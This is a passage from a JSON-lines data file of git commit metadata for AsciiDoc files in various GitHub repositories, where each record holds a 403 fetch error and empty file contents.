{"commit":"1e1280cf78c008147f4ec3db8e75871ca5504dc0","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a70ec1b903f5d2fce855008ee6d25df22d6a5bc8","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a579746bc4b4c31de5bad1c86f633aaa490442d1","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c53dd5ef5054643d8a2486ba2a7308768c5b7ec","subject":"Documentation changes.","message":"Documentation changes.\n","repos":"destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts,destijl\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fd1d9f69cac1f0b0c3d15f30bed12ace5f8944d2","subject":"Added Camel 2.18.2 release notes to docs","message":"Added Camel 2.18.2 release notes to docs\n","repos":"christophd\/camel,pax95\/camel,tadayosi\/camel,sverkera\/camel,jamesnetherton\/camel,tadayosi\/camel,christophd\/camel,zregvart\/camel,DariusX\/camel,pax95\/camel,davidkarlsen\/camel,DariusX\/camel,jamesnetherton\/camel,sverkera\/camel,apache\/camel,alvinkwekel\/camel,onders86\/camel,christophd\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,tadayosi\/camel,nicolaferraro\/camel,anoordover\/camel,nicolaferraro\/camel,cunningt\/camel,davidkarlsen\/camel,objectiser\/camel,onders86\/camel,CodeSmell\/camel,jamesnetherton\/camel,tdiesler\/camel,punkhorn\/camel-upstream,mcollovati\/camel,gnodet\/camel,onders86\/camel,objectiser\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,sverkera\/camel,pax95\/camel,adessaigne\/camel,ullgren\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,jamesnetherton\/camel,davidkarlsen\/camel,kevinearls\/camel,alvinkwekel\/camel,davidkarlsen\/camel,jamesnetherton\/camel,gnodet\/camel,kevinearls\/camel,ullgren\/camel,Fabryprog\/camel,nikhilvibhav\/camel,onders86\/camel,pmoerenhout\/camel,pmoerenhout\/camel,onders86\/camel,alvinkwekel\/camel,anoordover\/camel,Fabryprog\/camel,kevinearls\/camel,christophd\/camel,cunningt\/camel,kevinearls\/camel,christophd\/camel,zregvart\/camel,mcollovati\/camel,onders86\/camel,pax95\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,tdiesler\/camel,gnodet\/camel,pax95\/camel,pmoerenhout\/camel,sverkera\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,objectiser\/camel,sverkera\/camel,objectiser\/camel,sverkera\/camel,nicolaferraro\/camel,adessaigne\/camel,Fabryprog\/camel,apache\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,anoordover\/camel,tdiesler\/camel,tadayosi\/camel,punkhorn\/camel-upstream,adessaigne\/camel,gnodet\/camel,adessaigne\/camel,gnodet\/camel,kevinearls\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,anoordover\/camel,apache\/camel,kevinearls\/camel,zregvart\/camel,tdiesler\/camel,CodeSmell\/camel,CodeSmell\/camel,apache\/camel,anoordover\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,DariusX\/camel,ullgren\/camel,pmoerenhout\/camel,cunningt\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,Fabryprog\/camel,tdiesler\/camel,ullgren\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2182-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2182-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7e80c9006515ad34754ee828aeae71c7bcc0bd7","subject":"Create ArchitectureDocumentation.asciidoc","message":"Create ArchitectureDocumentation.asciidoc\n","repos":"RainerWinkler\/Moose-Diagram","old_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RainerWinkler\/Moose-Diagram.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"490099cd6960233c50ea846e3cc40aa338d4b0f0","subject":"update doc","message":"update doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"86d8fe0e29490b0ae8166c7293cd40ae9b6bc3f9","subject":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","message":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72e65f06500ca8a784bc7b0a60641ca443a94b86","subject":"OGM-659 Adding note on experimental features to reference guide","message":"OGM-659 Adding note on experimental features to reference guide\n","repos":"tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,mp911de\/hibernate-ogm,mp911de\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,jhalliday\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,uugaa\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,jhalliday\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,ZJaffee\/hibernate-ogm,hferentschik\/hibernate-ogm,DavideD\/hibernate-ogm-contrib","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/preface.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/preface.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"e60af34bd259861a47715186b63f6c1cfd8dac3f","subject":"Basic documentation for enironment variables, fixes #58","message":"Basic documentation for enironment variables, fixes #58\n","repos":"goldmann\/docker-scripts,goldmann\/docker-squash","old_file":"docs\/environment_variables.adoc","new_file":"docs\/environment_variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldmann\/docker-squash.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8af8e07417768f5955996fd890e6b8c0956377","subject":"Create migration_guide.adoc","message":"Create migration_guide.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/migration_guide.adoc","new_file":"userguide\/tutorials\/migration_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b507b003c836b329aa434c6d8f7941fc7f7a7d19","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9989801df900b5bac3070bef4684aa86096eaf44","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8cd375c37a43d4664b111a2b120b0f0aa4c791a","subject":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c081fcbc14a911fce91ba350d6a2206ae01ee6b8","subject":"Update 2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","message":"Update 2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","new_file":"_posts\/2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57dc39865bbf75c64f063dc9de6401890e8d70c7","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84223d00f92d7aed2136a5e51d1ecc1a7ee7dff4","subject":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","message":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a26b7f4c32dbb7c7ef7c190ee5fdf27e4caee3a0","subject":"y2b create post DRONE Controller Unboxing \\u0026 Demo","message":"y2b create post DRONE Controller Unboxing \\u0026 Demo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-18-DRONE-Controller-Unboxing-u0026-Demo.adoc","new_file":"_posts\/2014-03-18-DRONE-Controller-Unboxing-u0026-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd935a7b26c4dbcc6956a9269ff944ed15aa56fa","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5adfed2c37445b5620c55a0394ff2d9cae8d2441","subject":"Adds the Public Type System & Type Annotation CIP","message":"Adds the Public Type System & Type Annotation CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-09-16-public-type-system-type-annotation.adoc","new_file":"cip\/CIP2015-09-16-public-type-system-type-annotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36133d93fe3de840b6a3ec999e26880ff7be3654","subject":"Fix incorrect header depth in the documentation","message":"Fix incorrect header depth in the documentation\n","repos":"NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,qerub\/spring-boot,joansmith\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,nebhale\/spring-boot,ollie314\/spring-boot,donhuvy\/spring-boot,neo4j-contrib\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,philwebb\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,izeye\/spring-boot,herau\/spring-boot,sebastiankirsch\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,shakuzen\/spring-boot,habuma\/spring-boot,dreis2211\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,lenicliu\/spring-boot,NetoDevel\/spring-boot,herau\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,deki\/spring-boot,herau\/spring-boot,spring-projects\/spring-boot,jayarampradhan\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,sebastiankirsch\/spring-boot,isopov\/spring-boot,brettwooldridge\/spring-boot,isopov\/spring-boot,mbogoevici\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,kamilszymanski\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,izeye\/spring-boot,chrylis\/spring-boot,mbogoevici\/spring-boot,zhanhb\/spring-boot,ihoneymon\/spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,SaravananParthasarathy\/SPSDemo,lburgazzoli\/spring-boot,jxblum\/spring-boot,ihoneymon\/spring-boot,michael-simons\/spring-boot,sebastiankirsch\/spring-boot,isopov\/spring-boot,javyzheng\/spring-boot,brettwooldridge\/spring-boot,thomasdarimont\/spring-boot,Nowheresly\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,bijukunjummen\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,olivergierke\/spring-boot,qerub\/spring-boot,ollie314\/spring-boot,afroje-reshma\/spring-boot-sample,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,afroje-reshma\/spring-boot-sample,kdvolder\/spring-boot,sbcoba\/spring-boot,bclozel\/spring-boot,pvorb\/spring-boot,hello2009chen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mdeinum\/spring-boot,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,joansmith\/spring-boot,mbenson\/spring-boot,joansmith\/spring-boot,yhj630520\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,i007422\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,jvz\/spring-boot,lexandro\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,bbrouwer\/spring-boot,herau\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,lenicliu\/spring-boot,joshiste\/spring-boot,royclarkson\/spring-boot,philwebb\/spring-boot,xiaoleiPENG\/my-project,kdvolder\/spring-boot,isopov\/spring-boot,lburgazzoli\/spring-boot,jvz\/spring-boot,qerub\/spring-boot,sbcoba\/spring-boot,pvorb\/spring-boot,jvz\/spring-boot,brettwooldridge\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,vpavic\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,joshthornhill\/spring-boot,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,jmnarloch\/spring-boot,DeezCashews\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,philwebb\/spring-boot-concourse,bijukunjummen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,joansmith\/spring-boot,hello2009chen\/spring-boot,jxblum\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,yangdd1205\/spring-boot,akmaharshi\/jenkins,rweisleder\/spring-boot,Buzzardo\/spring-boot,izeye\/spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,linead\/spring-boot,mbogoevici\/spring-boot,tsachev\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,deki\/spring-boot,NetoDevel\/spring-boot,candrews\/spring-boot,bijukunjummen\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,jbovet\/spring-boot,philwebb\/spring-boot-concourse,candrews\/spring-boot,habuma\/spring-boot,jbovet\/spring-boot,akmaharshi\/jenkins,felipeg48\/spring-boot,habuma\/spring-boot,Buzzardo\/spring-boot,hello2009chen\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,donhuvy\/spring-boot,vakninr\/spring-boot,brettwooldridge\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,donhuvy\/spring-boot,shakuzen\/spring-boot,candrews\/spring-boot,linead\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,lucassaldanha\/spring-boot,herau\/spring-boot,mbogoevici\/spring-boot,philwebb\/spring-boot-concourse,philwebb\/spring-boot,eddumelendez\/spring-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,joshiste\/spring-boot,Buzzardo\/spring-boot,ptahchiev\/spring-boot,qerub\/spring-boot,shangyi0102\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,cleverjava\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,ptahchiev\/spring-boot,neo4j-contrib\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,felipeg48\/spring-boot,yangdd1205\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,kamilszymanski\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,deki\/spring-boot,rweisleder\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,SaravananParthasarathy\/SPSDemo,DeezCashews\/spring-boot,linead\/spring-boot,kamilszymanski\/spring-boot,philwebb\/spring-boot,izeye\/spring-boot,jvz\/spring-boot,royclarkson\/spring-boot,joshthornhill\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,bjornlindstrom\/spring-boot,neo4j-contrib\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lexandro\/spring-boot,deki\/spring-boot,sebastiankirsch\/spring-boot,aahlenst\/spring-boot,lburgazzoli\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,deki\/spring-boot,mosoft521\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,DeezCashews\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,candrews\/spring-boot,zhanhb\/spring-boot,vpavic\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,drumonii\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,mosoft521\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,Nowheresly\/spring-boot,thomasdarimont\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,nebhale\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,lucassaldanha\/spring-boot,jayarampradhan\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,yhj630520\/spring-boot,jbovet\/spring-boot,ihoneymon\/spring-boot,jxblum\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,bjornlindstrom\/spring-boot,shakuzen\/spring-boot,vakninr\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,sbcoba\/spring-boot,tsachev\/spring-boot,lexandro\/spring-boot,akmaharshi\/jenkins,vpavic\/spring-boot,vpavic\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,SaravananParthasarathy\/SPSDemo,jxblum\/spring-boot,htynkn\/spring-boot,olivergierke\/spring-boot,isopov\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,spring-projects\/spring-boot,ptahchiev\/spring-boot,SaravananParthasarathy\/SPSDemo,sebastiankirsch\/spring-boot,rweisleder\/spring-boot,pvorb\/spring-boot,DeezCashews\/spring-boot,lenicliu\/spring-boot,afroje-reshma\/spring-boot-sample,minmay\/spring-boot,bclozel\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,spring-projects\/spring-boot,qerub\/spring-boot,isopov\/spring-boot,javyzheng\/spring-boot,lenicliu\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,SaravananParthasarathy\/SPSDemo,yangdd1205\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,jmnarloch\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,bclozel\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,joshthornhill\/spring-boot,tiarebalbi\/spring-boot,hqrt\/jenkins2-course-spring-boot,mbenson\/spring-boot,olivergierke\/spring-boot,vakninr\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,dreis2211\/spring-boot,minmay\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,chrylis\/spring-boot,shangyi0102\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,javyzheng\/spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,scottfrederick\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,minmay\/spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,tiarebalbi\/spring-boot,spring-projects\/spring-boot,wilkinsona\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,htynkn\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,scottfrederick\/spring-boot,eddumelendez\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,habuma\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,pvorb\/spring-boot,michael-simons\/spring-boot,jmnarloch\/spring-boot,neo4j-contrib\/spring-boot,olivergierke\/spring-boot,xiaoleiPENG\/my-project,RichardCSantana\/spring-boot,mosoft521\/spring-boot,hqrt\/jenkins2-course-spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,akmaharshi\/jenkins,aahlenst\/spring-boot,habuma\/spring-boot,candrews\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/build-tool-plugins.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/build-tool-plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"926a17a76cd8c149b29598a36714ff0145541fa8","subject":"Update 2014-09-20-Trying-a-new-theme.adoc","message":"Update 